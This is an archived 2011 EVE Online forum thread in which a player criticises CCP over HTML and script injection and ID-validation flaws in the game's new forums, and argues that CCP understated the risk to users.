EVE Search - New EVE Online forums temporarily disabled

All Channels

EVE General Discussion

New EVE Online forums temporarily disabled

» Click here to find additional results for this topic using Google

Monitor this thread via RSS [?]

Author	Thread Statistics \| Show CCP posts - 36 post(s)
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 14:54:00 - [1] Edited by: Helicity Boson on 10/04/2011 14:54:40 You're also being lied to. While your customer data over at CCP was indeed safe, the new forums put everyone that visited them at risk. Saying we were completely safe is, demonstrably, FALSE. I've written up a blog post on the subject here: http://www.machine9.net/blog/?p=592 After posting this, I suspect this will mean goodbye for me, so let me just preemptively state that I will miss you all, and for all your flaws you ARE the best game community in the world.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 16:28:00 - [2] Edited by: Helicity Boson on 10/04/2011 16:31:30 Originally by: CCP Sreegs There are 3 problems with your post. A) It's premature, pending investigation but from what I recall though the signatures would allow HTML you could not execute script, which kills a lot of your assertions. Horsedung. And you know it. Javascript and CSS were confirmed to work. I appreciate your need to save face, but your guys made an unforgivable screwup, own up to it and instill me with the feeling you guys are deserving of our trust. And no matter what, that you didn't even see the error in your login design for forum posting and the documented injection holes in the forum you gutted to serve as a base for "your" 72,000 man hour project is pretty damning. You need peer reviews of code, you need penetration tests. But most of all you need to get your collective heads out of your "awesome" backsides and start communicating internally and externally. And above all you need to be honest and forthcoming.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 16:35:00 - [3] Edited by: Helicity Boson on 10/04/2011 16:38:15 Originally by: CCP Sreegs my job is to determine and respond to the problem. Honestly. I appreciate that, I'm not having a go at you as a person. These things are some pretty damned basic security risks, and you cannot in good conscience sit there and just blankly state "your account info was not compromised" when that is only a half truth, yeah your logins were safe, but their browsers weren't. I'd also really appreciate a devblog detailing how something THIS BASIC could go live like this. And how you are altering peer review procedures to make sure it does not happen again. I'm not causing a ruckus because I don't like you, I'm doing so because you have let us down, yet again, but you're all still walking around with your head in the clouds of "awesome". I want you to be the company we deserve, and you are failing. Also, please don't make me bring up the part of last night where I was explaining how it was done to one of your coworkers via someone with access to your communicator and they didn't and quote "get it." I'm pretty mad at CCP as a whole, please don't pour fuel on my fire.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 16:44:00 - [4] Originally by: CCP Sreegs My job isn't to make anyone look good it's to catch bad guys and deal with problems. Good, so we can look forwards to a devblog explaining exactly what changes you are going to make in your structure to make sure something so utterly moronic as not having validation on a charID number will never ever ever occur then? Because frankly that makes me even more mad than the injection (which is also unforgivable really). If you do that, then we have a deal. If, instead, you guys just keep monkeying around and pretend it took 72,000 man hours to chop down an existing forum, break it's security and then reskin it. Then we're going to be having a problem.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 16:50:00 - [5] Sean, btw, who do you think Virt was copy/pasting to you last night?
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 16:57:00 - [6] Originally by: CCP Sreegs I'm saying exactly what I said. you're damned if you do, damned if you don't mate. I don't believe for one second your "review" will ever yield any result other than "no we were safe". Especially since via-via-via-IM I was showing you how the night before and you didn't get it. You'd never own up to the site being vulnerable anyways, and it's that fact that makes me shudder with revulsion. Terrible coding practices combined with a willingness to lie make for a grim picture indeed.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 17:04:00 - [7] Originally by: Bomberlocks ]If that is the case, why did CCP ignore Virtuozzo's and Helicity's attempts to warn you? To be fair they didn't do that.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 17:12:00 - [8] Originally by: CCP Sreegs or there's a really really hilarious miscommunication chain here. It's that. But in the scheme of thing this is moot.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 17:20:00 - [9] Originally by: CCP Sreegs I did have some information forwarded to me, that was used. But I had no IM convo tmk. yeah, that's the info I was giving via an extremely convoluted route, but this is irrelevant to the discussion, I just wanted to make sure you knew where it was coming from and why I'm skeptical of how sincere (and accurate) your blog post will be. We'll be scrutinizing said blog post very closely, I hope you can find it in yourself to be honest and forthright in it.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 19:20:00 - [10] I feel a little bad for flaming CCP Sreegs, it really isn't his fault. But you know me, I get all worked up and stuff. re: bannings. I do think the ban is appropriate, whereas I only verified it was possible, I didn't go and USE the exploit. I blew the whistle instead, which was the right thing to do.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.10 20:18:00 - [11] Originally by: Elyssa MacLeod whaaaaaaat helicity with a conscience? Tell me you got hacked an this really isnt you it's more likely than you think. Heck, it's why I get so wound up to begin with.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.11 16:30:00 - [12] Originally by: Miilla Stable and Secure YAF has been vetted. YAF has been around since 2003. During that time, the application has been throughly tested. Since the code has been freely available for 7 years, there is nothing to hide and no stone has been left unturned. You are correct. There's nothing inherently wrong with YAF. The blame for this shameful debacle lies squarely with CCP and their incompetent gutting of a working bit of software. I'm still not entirely sure how I feel about all this.
Helicity Boson Amarr The Python Cartel. The Defenders of Pen Island	Posted - 2011.04.12 12:33:00 - [13] Originally by: Barakkus Edited by: Barakkus on 12/04/2011 12:11:57 Originally by: Kristina Vanszar Edited by: Kristina Vanszar on 12/04/2011 10:05:00 The DEV BLOG, not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML. Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, and gather a some login informations??? OR, add a HTML or even Iframe which calls an external script? Sorry, but i do not belive that devblog.... Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff.... The html injection into sigs didn't work so well anyways, I experimented trying to get an image and stuff in my sig while the forums were up and a lot of it got stripped or messed with that broke what I was trying to do anyways. My associate and I do not fully agree with his assesment about the injection, we're quite sure it was still possible (just not easy). But for the most part I am content with the blog, we have sent our further concerns to the security email address so they can verify and fix. This blog is about as good as we're going to get, and it's appropriate and correct from Sreeg's position. The real reckoning needs to come from higher up, as to how this was even possible, and how 72,000 man hours could yield such an unworthy result.

COPYRIGHT NOTICE
EVE Online, the EVE logo, EVE and all associated logos and designs are the intellectual property of CCP hf. All artwork, screenshots, characters, vehicles, storylines, world facts or other recognizable features of the intellectual property relating to these trademarks are likewise the intellectual property of CCP hf. EVE Online and the EVE logo are the registered trademarks of CCP hf. All rights are reserved worldwide. All other trademarks are the property of their respective owners. CCP hf. has granted permission to EVE-Search.com to use EVE Online and all associated logos and designs for promotional and information purposes on its website but does not endorse, and is not in any way affiliated with, EVE-Search.com. CCP is in no way responsible for the content on or functioning of this website, nor can it be liable for any damage arising from the use of this website.